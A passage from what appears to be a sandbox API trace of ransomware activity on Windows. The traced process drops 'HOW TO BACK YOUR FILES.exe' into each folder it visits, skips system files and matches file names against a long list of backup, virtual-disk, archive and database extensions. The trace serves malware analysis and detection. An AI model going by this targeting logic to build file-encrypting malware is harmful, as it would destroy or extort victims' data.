lstrcmpiW (lpString1="Patch", lpString2="perflogs") returned -1 [0083.036] lstrcmpiW (lpString1="Patch", lpString2="MSBuild") returned 1 [0083.036] lstrlenW (lpString="Patch") returned 5 [0083.036] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\*") returned 84 [0083.036] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="Patch" | out: lpString1="Patch") returned="Patch" [0083.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0083.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb2) returned 0x2f2fc8 [0083.036] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0083.036] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Patch", cAlternateFileName="")) returned 0 [0083.036] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0083.036] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0083.036] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" [0083.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0083.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0083.036] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned 88 [0083.036] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" | out: lpString1="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch") returned="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch" [0083.037] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.037] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.037] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.037] GetLastError () returned 0x0 [0083.037] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.037] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.037] CloseHandle (hObject=0x120) returned 1 [0083.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.037] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.038] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0083.038] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.038] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.038] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.038] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.038] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.038] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.038] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.038] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.038] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2a3960, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.038] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.038] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="aoldtz.exe") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2=".") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="..") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="windows") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="bootmgr") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="temp") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="pagefile.sys") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="boot") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="ids.txt") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="ntuser.dat") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="perflogs") returned 1 [0083.038] lstrcmpiW (lpString1="x64", lpString2="MSBuild") returned 1 [0083.038] lstrlenW (lpString="x64") returned 3 [0083.038] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\*") returned 90 [0083.038] lstrcpyW (in: lpString1=0x2cce4b2, lpString2="x64" | out: lpString1="x64") returned="x64" [0083.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0083.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xba) returned 0x2cfda8 [0083.039] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0083.039] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 0 [0083.039] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0083.039] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7bd0 [0083.039] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" [0083.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0083.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7bc8 | out: hHeap=0x2b0000) returned 1 [0083.039] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned 92 [0083.039] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" | out: lpString1="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64") returned="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64" [0083.039] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.039] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\54050a5f8ae7f0c56e553f0090146c17a1d2bf8d\\packages\\patch\\x64\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.039] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.040] GetLastError () returned 0x0 [0083.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.040] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.040] CloseHandle (hObject=0x120) returned 1 [0083.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.040] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.040] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0083.040] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.040] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.040] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.040] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa989d730, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c2a3960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.040] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.040] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.040] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.040] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.040] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c2a3960, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c2a3960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.040] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.040] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ab54b00, ftCreationTime.dwHighDateTime=0x1d1a02d, ftLastAccessTime.dwLowDateTime=0x9ab54b00, ftLastAccessTime.dwHighDateTime=0x1d1a02d, ftLastWriteTime.dwLowDateTime=0x9ab54b00, ftLastWriteTime.dwHighDateTime=0x1d1a02d, nFileSizeHigh=0x0, nFileSizeLow=0xfc93c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows6.1-KB2999226-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0083.040] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.040] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="aoldtz.exe") returned 1 [0083.040] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".") returned 1 [0083.040] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="..") returned 1 [0083.040] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="windows") returned 1 [0083.040] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="bootmgr") returned 1 [0083.040] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="temp") returned 1 [0083.041] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="pagefile.sys") returned 1 [0083.041] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="boot") returned 1 [0083.041] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="ids.txt") returned 1 [0083.041] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="ntuser.dat") returned 1 [0083.041] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="perflogs") returned 1 [0083.041] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2="MSBuild") returned 1 [0083.041] lstrlenW (lpString="Windows6.1-KB2999226-x64.msu") returned 28 [0083.041] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\\packages\\Patch\\x64\\*") returned 94 [0083.041] lstrcpyW (in: lpString1=0x2cce4ba, lpString2="Windows6.1-KB2999226-x64.msu" | out: lpString1="Windows6.1-KB2999226-x64.msu") returned="Windows6.1-KB2999226-x64.msu" [0083.041] lstrlenW (lpString="Windows6.1-KB2999226-x64.msu") returned 28 [0083.041] lstrlenW (lpString="Ares865") returned 7 [0083.041] lstrcmpiW (lpString1="x64.msu", lpString2="Ares865") returned 1 [0083.041] lstrlenW (lpString=".dll") returned 4 [0083.041] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".dll") returned 1 [0083.041] lstrlenW (lpString=".lnk") returned 4 [0083.041] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".lnk") returned 1 [0083.041] lstrlenW (lpString=".ini") returned 4 [0083.041] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".ini") returned 1 [0083.041] lstrlenW (lpString=".sys") returned 4 [0083.041] lstrcmpiW (lpString1="Windows6.1-KB2999226-x64.msu", lpString2=".sys") returned 1 [0083.041] lstrlenW (lpString="Windows6.1-KB2999226-x64.msu") returned 28 [0083.041] lstrlenW (lpString="bak") returned 3 [0083.041] lstrcmpiW (lpString1="msu", lpString2="bak") returned 1 [0083.041] lstrlenW (lpString="ba_") returned 3 [0083.041] lstrcmpiW (lpString1="msu", lpString2="ba_") returned 1 [0083.041] lstrlenW (lpString="dbb") returned 3 [0083.041] lstrcmpiW (lpString1="msu", lpString2="dbb") returned 1 [0083.041] lstrlenW (lpString="vmdk") returned 4 [0083.041] lstrcmpiW (lpString1=".msu", lpString2="vmdk") returned -1 [0083.041] lstrlenW (lpString="rar") returned 3 [0083.041] lstrcmpiW (lpString1="msu", lpString2="rar") returned -1 [0083.041] lstrlenW (lpString="zip") returned 3 [0083.041] lstrcmpiW (lpString1="msu", lpString2="zip") returned -1 [0083.041] lstrlenW (lpString="tgz") returned 3 [0083.041] lstrcmpiW (lpString1="msu", lpString2="tgz") returned -1 [0083.041] lstrlenW (lpString="vbox") returned 4 [0083.041] lstrcmpiW (lpString1=".msu", lpString2="vbox") returned -1 [0083.042] lstrlenW (lpString="vdi") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="vdi") returned -1 [0083.042] lstrlenW (lpString="vhd") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="vhd") returned -1 [0083.042] lstrlenW (lpString="vhdx") returned 4 [0083.042] lstrcmpiW (lpString1=".msu", lpString2="vhdx") returned -1 [0083.042] lstrlenW (lpString="avhd") returned 4 [0083.042] lstrcmpiW (lpString1=".msu", lpString2="avhd") returned -1 [0083.042] lstrlenW (lpString="db") returned 2 [0083.042] lstrcmpiW (lpString1="su", lpString2="db") returned 1 [0083.042] lstrlenW (lpString="db2") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="db2") returned 1 [0083.042] lstrlenW (lpString="db3") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="db3") returned 1 [0083.042] lstrlenW (lpString="dbf") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="dbf") returned 1 [0083.042] lstrlenW (lpString="mdf") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="mdf") returned 1 [0083.042] lstrlenW (lpString="mdb") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="mdb") returned 1 [0083.042] lstrlenW (lpString="sql") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="sql") returned -1 [0083.042] lstrlenW (lpString="sqlite") returned 6 [0083.042] lstrcmpiW (lpString1="64.msu", lpString2="sqlite") returned -1 [0083.042] lstrlenW (lpString="sqlite3") returned 7 [0083.042] lstrcmpiW (lpString1="x64.msu", lpString2="sqlite3") returned 1 [0083.042] lstrlenW (lpString="sqlitedb") returned 8 [0083.042] lstrcmpiW (lpString1="-x64.msu", lpString2="sqlitedb") returned 1 [0083.042] lstrlenW (lpString="xml") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="xml") returned -1 [0083.042] lstrlenW (lpString="$er") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="$er") returned 1 [0083.042] lstrlenW (lpString="4dd") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="4dd") returned 1 [0083.042] lstrlenW (lpString="4dl") returned 3 [0083.042] lstrcmpiW (lpString1="msu", lpString2="4dl") returned 1 [0083.042] lstrlenW (lpString="^^^") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="^^^") returned 1 [0083.043] lstrlenW (lpString="abs") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="abs") returned 1 [0083.043] lstrlenW (lpString="abx") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="abx") returned 1 [0083.043] lstrlenW (lpString="accdb") returned 5 [0083.043] lstrcmpiW (lpString1="4.msu", lpString2="accdb") returned -1 [0083.043] lstrlenW (lpString="accdc") returned 5 [0083.043] lstrcmpiW (lpString1="4.msu", lpString2="accdc") returned -1 [0083.043] lstrlenW (lpString="accde") returned 5 [0083.043] lstrcmpiW (lpString1="4.msu", lpString2="accde") returned -1 [0083.043] lstrlenW (lpString="accdr") returned 5 [0083.043] lstrcmpiW (lpString1="4.msu", lpString2="accdr") returned -1 [0083.043] lstrlenW (lpString="accdt") returned 5 [0083.043] lstrcmpiW (lpString1="4.msu", lpString2="accdt") returned -1 [0083.043] lstrlenW (lpString="accdw") returned 5 [0083.043] lstrcmpiW (lpString1="4.msu", lpString2="accdw") returned -1 [0083.043] lstrlenW (lpString="accft") returned 5 [0083.043] lstrcmpiW (lpString1="4.msu", lpString2="accft") returned -1 [0083.043] lstrlenW (lpString="adb") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="adb") returned 1 [0083.043] lstrlenW (lpString="adb") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="adb") returned 1 [0083.043] lstrlenW (lpString="ade") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="ade") returned 1 [0083.043] lstrlenW (lpString="adf") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="adf") returned 1 [0083.043] lstrlenW (lpString="adn") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="adn") returned 1 [0083.043] lstrlenW (lpString="adp") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="adp") returned 1 [0083.043] lstrlenW (lpString="alf") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="alf") returned 1 [0083.043] lstrlenW (lpString="ask") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="ask") returned 1 [0083.043] lstrlenW (lpString="btr") returned 3 [0083.043] lstrcmpiW (lpString1="msu", lpString2="btr") returned 1 [0083.044] lstrlenW (lpString="cat") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="cat") returned 1 [0083.044] lstrlenW (lpString="cdb") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="cdb") returned 1 [0083.044] lstrlenW (lpString="ckp") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="ckp") returned 1 [0083.044] lstrlenW (lpString="cma") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="cma") returned 1 [0083.044] lstrlenW (lpString="cpd") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="cpd") returned 1 [0083.044] lstrlenW (lpString="dacpac") returned 6 [0083.044] lstrcmpiW (lpString1="64.msu", lpString2="dacpac") returned -1 [0083.044] lstrlenW (lpString="dad") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="dad") returned 1 [0083.044] lstrlenW (lpString="dadiagrams") returned 10 [0083.044] lstrcmpiW (lpString1="26-x64.msu", lpString2="dadiagrams") returned -1 [0083.044] lstrlenW (lpString="daschema") returned 8 [0083.044] lstrcmpiW (lpString1="-x64.msu", lpString2="daschema") returned 1 [0083.044] lstrlenW (lpString="db-journal") returned 10 [0083.044] lstrcmpiW (lpString1="26-x64.msu", lpString2="db-journal") returned -1 [0083.044] lstrlenW (lpString="db-shm") returned 6 [0083.044] lstrcmpiW (lpString1="64.msu", lpString2="db-shm") returned -1 [0083.044] lstrlenW (lpString="db-wal") returned 6 [0083.044] lstrcmpiW (lpString1="64.msu", lpString2="db-wal") returned -1 [0083.044] lstrlenW (lpString="dbc") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="dbc") returned 1 [0083.044] lstrlenW (lpString="dbs") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="dbs") returned 1 [0083.044] lstrlenW (lpString="dbt") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="dbt") returned 1 [0083.044] lstrlenW (lpString="dbv") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="dbv") returned 1 [0083.044] lstrlenW (lpString="dbx") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="dbx") returned 1 [0083.044] lstrlenW (lpString="dcb") returned 3 [0083.044] lstrcmpiW (lpString1="msu", lpString2="dcb") returned 1 [0083.044] lstrlenW (lpString="dct") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="dct") returned 1 [0083.045] lstrlenW (lpString="dcx") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="dcx") returned 1 [0083.045] lstrlenW (lpString="ddl") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="ddl") returned 1 [0083.045] lstrlenW (lpString="dlis") returned 4 [0083.045] lstrcmpiW (lpString1=".msu", lpString2="dlis") returned -1 [0083.045] lstrlenW (lpString="dp1") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="dp1") returned 1 [0083.045] lstrlenW (lpString="dqy") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="dqy") returned 1 [0083.045] lstrlenW (lpString="dsk") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="dsk") returned 1 [0083.045] lstrlenW (lpString="dsn") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="dsn") returned 1 [0083.045] lstrlenW (lpString="dtsx") returned 4 [0083.045] lstrcmpiW (lpString1=".msu", lpString2="dtsx") returned -1 [0083.045] lstrlenW (lpString="dxl") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="dxl") returned 1 [0083.045] lstrlenW (lpString="eco") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="eco") returned 1 [0083.045] lstrlenW (lpString="ecx") returned 3 [0083.045] lstrcmpiW (lpString1="msu", lpString2="ecx") returned 1 [0083.045] lstrlenW 